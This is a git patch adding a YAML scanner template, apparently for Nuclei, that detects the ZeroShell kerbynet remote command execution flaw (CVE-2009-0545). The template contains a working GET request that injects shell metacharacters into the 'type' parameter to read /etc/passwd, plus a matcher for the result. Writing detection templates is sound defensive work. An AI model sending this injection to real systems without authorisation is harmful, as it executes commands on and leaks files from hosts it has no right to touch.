From c55b2c58dbf933f9f9b536ba07098999278a717b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 19 May 2021 14:40:37 +0000 Subject: [PATCH 1/2] Create CVE-2009-0545.yaml --- cves/2009/CVE-2009-0545.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2009/CVE-2009-0545.yaml diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml new file mode 100644 index 0000000000..b1046ab3dc --- /dev/null +++ b/cves/2009/CVE-2009-0545.yaml @@ -0,0 +1,20 @@ +id: CVE-2009-0545 + +info: + name: ZeroShell <= 1.0beta11 Remote Code Execution + author: geeknik + description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. + reference: https://www.exploit-db.com/exploits/8023 + severity: critical + tags: cve,cve2009,zeroshell,kerbynet,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" + + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" From 788fe276edaf4629642c5f68ee5bfbc7e03051d6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 19 May 2021 14:53:06 +0000 Subject: [PATCH 2/2] Update CVE-2009-0545.yaml --- cves/2009/CVE-2009-0545.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml index b1046ab3dc..7f00ae437c 100644 --- a/cves/2009/CVE-2009-0545.yaml +++ b/cves/2009/CVE-2009-0545.yaml @@ -7,12 +7,12 @@ info: reference: https://www.exploit-db.com/exploits/8023 severity: critical tags: cve,cve2009,zeroshell,kerbynet,rce - + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" - + matchers: - type: regex part: body